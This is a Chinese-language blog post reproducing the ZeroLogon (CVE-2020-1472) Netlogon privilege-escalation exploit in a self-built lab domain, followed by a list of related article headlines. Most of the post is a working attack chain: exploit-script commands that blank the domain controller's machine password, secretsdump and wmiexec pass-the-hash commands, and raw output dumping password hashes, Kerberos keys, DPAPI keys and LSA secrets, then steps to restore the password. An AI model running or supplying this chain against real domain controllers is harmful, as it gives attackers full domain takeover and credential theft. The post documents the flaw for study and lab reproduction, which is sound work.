微軟NetLogon權限提升 CVE-2020-1472 漏洞復現

2021-12-29 信Yang安全
文末原文連結可直達博客簡介

NetLogon 遠程協議是一種在 Windows 域控上使用的 RPC 接口,被用於各種與用戶和機器認證相關的任務。最常用於讓用戶使用 NTLM 協議登錄伺服器,也用於 NTP 響應認證以及更新計算機域密碼

微軟MSRC於8月11日 發布了Netlogon 特權提升漏洞安全通告。此漏洞CVE編號CVE-2020-1472, CVSS 評分:10.0。由 Secura 公司的 Tom Tervoort 發現提交並命名為 ZeroLogon

攻擊者使用 Netlogon 遠程協議 (MS-NRPC) 建立與域控制器連接的 Netlogon 安全通道時,存在特權提升漏洞。當成功利用此漏洞時,攻擊者可無需通過身份驗證,在網絡中的設備上運行經特殊設計的應用程式,獲取域控制器的管理員權限。

影響範圍

Windows Server, version 2004 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

步驟思路

利用EXP置空域控密碼-獲得用戶hash-通過hash取得一個shell-獲得機器保存的原hash-通過獲得的hash恢復置空域控密碼

自行本地組建域環境


POC驗證

https://github.com/SecuraBV/CVE-2020-1472

EXP攻擊

注意這裡請先安裝impacket,不然EXP很大概率是會產生報錯的
如下圖用setup安裝即可

EXP自行下載
https://github.com/dirkjanm/CVE-2020-1472
先將域控密碼置空
python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142

獲得域控上的hash如下:
python3 secretsdump.py 0day.org/OWA2010SP3$@192.168.3.142 -no-pass
這裡如果不置空密碼nopass其實是不會成功的,文末恢復上密碼時候有對比

一大把各種hash


利用獲得的用戶hash來登錄域控:
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c 0day.org/sqladmin@192.168.3.142
相關命令執行如下

導出sam等文件到本地,獲得域控上邊本地保存的置空前的hash

通過sam等文件獲得原ntlm hash:
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

[*] Target system bootKey: 0xe2daa1c5dca47d980c9c9a95b0409760
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:dbf5b27ba7b68e257e11b31854d6f6069746b88cca37879f11c3cc3fae38012b47df0a003ab2ff2ed3672ead8b61a232b8f562b61e28bbf8562dd797ce5439fd45e75daeb1b8467ce9805bdcb76093cf6cef8bc308a679e8688bb2f0f6256c14cbbdb1e48f320ebf2c34e667db98d399ea3f02854893cbffffd0613312a3b5b4806cee2534669871e8370d5729912e43456c627799f7b539b056094724a84340aa1ee317398f86f8956364d398d45a46d9c75d57c43ee9ea839a0587b5b16728e8bedce420a27c6e9f4a6d1face53e757e275edef3159e32712b03c8f65818bd3093ac630dbf7fb1477392acf4084695
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:91f32f0af885207c73f094618f1f42bf
[*] DefaultPassword
(Unknown User):ROOT# 123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7f62c3d11ca85ac5abf5bd5adf7e3dd5b85fe81b
dpapi_userkey:0xf89205346bcaf0c5aef5933db269de40fd2f3077
[*] L$ASP.NETAutoGenKeys2.0.50727.5420
0000 79 97 4E F4 29 D1 DA DF C0 C5 63 ED 04 9C C7 05 y.N.)c
0010 92 07 C5 0F 31 B0 A2 9B 8B 40 A7 5D 75 E1 43 AA ....1....@.]u.C.
0020 25 78 D0 DB 96 47 82 8A C7 AD 24 0D AF B7 B1 51 %x...G....$....Q
0030 AB B0 59 02 63 A3 03 58 65 14 FC C2 30 93 A1 DA ..Y.c..Xe...0...
0040 3D B1 8E C3 79 60 F6 86 A4 1C 02 77 A2 A8 CC D1 =...y`w....
0050 EB AE A9 8B 07 7E 71 C0 ~q.
L$ASP.NETAutoGenKeys2.0.50727.5420:79974ef429d1dadfc0c563ed049cc7059207c50f31b0a29b8b40a75d75e143aa2578d0db9647828ac7ad240dafb7b151abb0590263a303586514fcc23093a1da3db18ec37960f686a41c0277a2a8ccd1ebaea98b077e71c0
[*] NL$KM
0000 63 26 83 D5 19 BE 92 EE D2 08 87 7D 9B A6 35 16 c&....}..5.
0010 7F A7 E8 ED 0B 0E 8B A8 DF 33 35 89 F6 71 C3 53 ....35..q.S
0020 5A 1E B2 91 CA 68 F2 E4 FD 57 D8 0F 5C 4E 1B 8C Z....h...W..\N..
0030 41 FB 71 8C 5E 83 B3 FB D4 E0 5D F0 90 90 50 EE A.q.^]...P.
NL$KM:632683d519be92eed208877d9ba635167fa7e8ed0b0e8ba8df333589f671c3535a1eb291ca68f2e4fd57d80f5c4e1b8c41fb718c5e83b3fbd4e05df0909050ee
[*] Cleaning up...

恢復原hash,如下連結工具即可
https://github.com/risksense/zerologon

恢復前與恢復後對比:

E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/sqladmin:admin!@#45@192.168.3.142 -just-dc-user OWA2010SP3$
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
OWA2010SP3$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
OWA2010SP3$:aes256-cts-hmac-sha1-96:e80b9eb05118d4a05086fd34d1c3577602f7332fe61d0498a9ec45a23ec1e5f8
OWA2010SP3$:aes128-cts-hmac-sha1-96:be60933a403c732355cca898940f6d7d
OWA2010SP3$:des-cbc-md5:0dbc7c3279fed98f
[*] Cleaning up...

E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/sqladmin:admin!@#45@192.168.3.142 -just-dc-user OWA2010SP3$
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
OWA2010SP3$:1000:aad3b435b51404eeaad3b435b51404ee:91f32f0af885207c73f094618f1f42bf:::
[*] Cleaning up...

E:\Python36\impacket-master\examples>

確認恢復後同樣姿勢已無法獲得域控hash:

E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/OWA2010SP3$@192.168.3.142 -no-pass
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...

E:\Python36\impacket-master\examples>

感謝大佬們閱讀,向大佬們學習

相關焦點

  • NetLogon 域內提權漏洞(CVE-2020-1472)復現過程
    大家好,這裡是 滲透攻擊紅隊 的第 46 篇文章,本公眾號會記錄一些紅隊攻擊的筆記(由淺到深),不定時更新CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞,攻擊者通過NetLogon,建立與域控間易受攻擊的安全通道時
  • 漏洞風險提示|Netlogon 特權提升漏洞(CVE-2020-1472)
    Netlogon 特權提升漏洞(CVE-2020-1472)NetLogon 遠程協議是一種在 Windows 域控上使用的 RPC 接口,被用於各種與用戶和機器認證相關的任務。微軟MSRC於8月11日 發布了Netlogon 特權提升漏洞安全通告。此漏洞CVE編號CVE-2020-1472, CVSS 評分:10.0。由 Secura 公司的 Tom Tervoort 發現提交並命名為 ZeroLogon。在9月11日,漏洞發現者在 GitHub 上公開了漏洞測試工具並且放出了漏洞白皮書。
  • 『紅藍對抗』NetLogon權限提升漏洞
    日期:2021-06-10作者:herbmint介紹:這篇文章簡單復現了netlogon權限提升漏洞,對應 CVE-
  • CVE-2020-1472 NetLogon 權限提升漏洞研究
    CVE-2020-1472 NetLogon 權限提升漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS漏洞評分10分,漏洞利用後果嚴重,未經身份認證的攻擊者可通過使用 Netlogon 遠程協議(MS-NRPC)連接域控制器來利用此漏洞。成功利用此漏洞的攻擊者可獲得域管理員訪問權限。
  • ZeroLogon(CVE-2020-1472) 分析與狩獵
    2020年9月11日,安全公司Secura發布了公告,披露了Microsoft在2020年8月修補的漏洞細節(CVE-2020-1472
  • CVE-2020-1472 Netlogon權限提升漏洞分析
    目錄 一、漏洞信息      1. 漏洞簡述      2. 組件概述      3. 漏洞利用      4. 漏洞影響      5. 解決方案二、漏洞復現       1.漏洞防禦          1)流量側          2)終端側五、參考文獻六、特別聲明CVE-2020-1472,也稱Zerologon漏洞。該漏洞為微軟2020年8月份補丁日例行更新時公開的漏洞,以其10分的CVSS評分在當時引起諸多研究員重視。
  • CVE-2020-1472: NetLogon特權提升漏洞分析
    它將用戶的憑據傳遞給域控制器,然後返回用戶的域安全標識符和用戶權限。這通常稱為 pass-through 身份驗證。0x04 漏洞利用抓取netlogon 進行驗證的幾種包進行分析,wireshark 過濾包信息:netlogon.opnum == 4 || netlogon.opnum == 26 || netlogon.opnum == 30攻擊者ip(域內的一臺機器):192.168.148.138受害者ip(域控伺服器):192.168.148.134
  • CVE-2020-1472 NetLogon特權提升漏洞深入分析
    近日,大連網絡安全信息通報機制合作單位新華三集團提醒,微軟發布補丁修復了NetLogon權限提升漏洞(CVE-2020-1472,Zerologon),漏洞等級為嚴重級別 ,CVSS漏洞評分10分。漏洞背景2020年8月13日,微軟發布補丁修復了NetLogon權限提升漏洞(CVE-2020-1472,Zerologon),漏洞等級為嚴重級別 ,CVSS漏洞評分10分。2020年9月,國外安全廠商公開發布了NetLogon權限提升漏洞的驗證腳本和詳細的技術分析,同時該漏洞的利用工具也在github上公開,導致該漏洞被廣泛利用的風險大大提升。
  • Netlogon 特權提升漏洞(CVE-2020-1472)原理分析與驗證
    CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞。它是因為微軟在Netlogon協議中沒有正確使用加密算法而導致的漏洞。由於微軟在進行AES加密運算過程中,使用了AES-CFB8模式並且錯誤的將IV設置為全零,這使得攻擊者在明文(client challenge)、IV等要素可控的情況下,存在較高概率使得產生的密文為全零。下面就整個攻擊過程做一個簡要分析。
  • CVE-2020-1472漏洞分析
    Netlogon 特權提升漏洞(CVE-2020-1472)
  • 【漏洞通報】微軟NetLogon提權漏洞
    近日,奇安信CERT監測到國外安全廠商發布了NetLogon 權限提升漏洞(CVE-2020-1472)的詳細技術分析文章和驗證腳本。此漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS漏洞評分10分,漏洞利用後果嚴重,未經身份認證的攻擊者可通過使用 Netlogon 遠程協議(MS-NRPC)連接域控制器來利用此漏洞。成功利用此漏洞的攻擊者可獲得域管理員訪問權限。
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    *,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。 2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • 技術乾貨 | CVE-2020-1472 ZeroLogon漏洞分析利用
    歡迎各位添加微信號:asj-jacky加入安世加 交流群 和大佬們一起交流安全技術0x01漏洞簡介CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞,此漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS評分為10分。
  • 漏洞通告 | 微軟NetLogon特權提升漏洞
    CVE-2020-1472的NetLogon 特權提升漏洞,漏洞評分:10分。近日已有攻擊腳本公開,經過測試已成功復現。山石網科IPS已更新防護規則,我們強烈建議廣大用戶及時做好資產自查和預防工作。漏洞描述攻擊者使用Netlogon遠程協議(MS-NRPC)建立與域控制器的易受攻擊的Netlogon安全通道連接時,將存在特權提升漏洞。
  • VMware Fusion 權限提升漏洞(CVE-2020-3950)復現
    影響版本VMware Fusion < 11.5.2 VMware Remote Console for Mac <= 11.x VMware Horizon Client for Mac < 5.4.0 漏洞復現
  • NetLogon特權提升漏洞利用工具已公開,騰訊御界支持檢測
    最新消息是,該漏洞的利用工具也在github公開。NetLogon特權提升漏洞(CVE-2020-1472)高度危險,漏洞利用代碼公開意味著大規模的漏洞利用將很快到來。騰訊安全團隊緊急響應,騰訊T-Sec高級威脅檢測系統(御界)已率先支持檢測NetLogon特權提升漏洞的攻擊利用。
  • CVE-2020-0796--永恆之黑漏洞復現
    >自2020年3月12日,微軟正式發布CVE-2020-0796高危漏洞補丁後,時隔數月,遠程利用PoC代碼已經被公布,這也意味著這場漏洞風波即將告一段落了。本文匯總了多個CVE-2020-0796 漏洞檢測及利用工具,方便系統管理員對未修復漏洞的系統進行檢測和防護。
  • 【漏洞預警】(CVE-2020-1472)被黑客廣泛應用
    2020年8月12日,阿里雲應急響應中心監測到,微軟發布了補丁來修復NetLogon特權升級漏洞(CVE-2020-1472),CVSS評分為10
  • VMware域環境搭建及Netlogon漏洞復現
    2、域控及DNS伺服器(192.168.154.30)安裝打開伺服器管理器,點擊添加角色和功能勾選AD域服務和DNS伺服器一直下一步,點擊安裝安裝完成後,需要將伺服器提升為域控制器1、漏洞簡介Netlogon協議是微軟提供的一套域訪問認證協議。
  • CVE-2020-2883漏洞復現
    簡介在Oracle官方發布的2020年4月關鍵補丁更新公告CPU(Critical Patch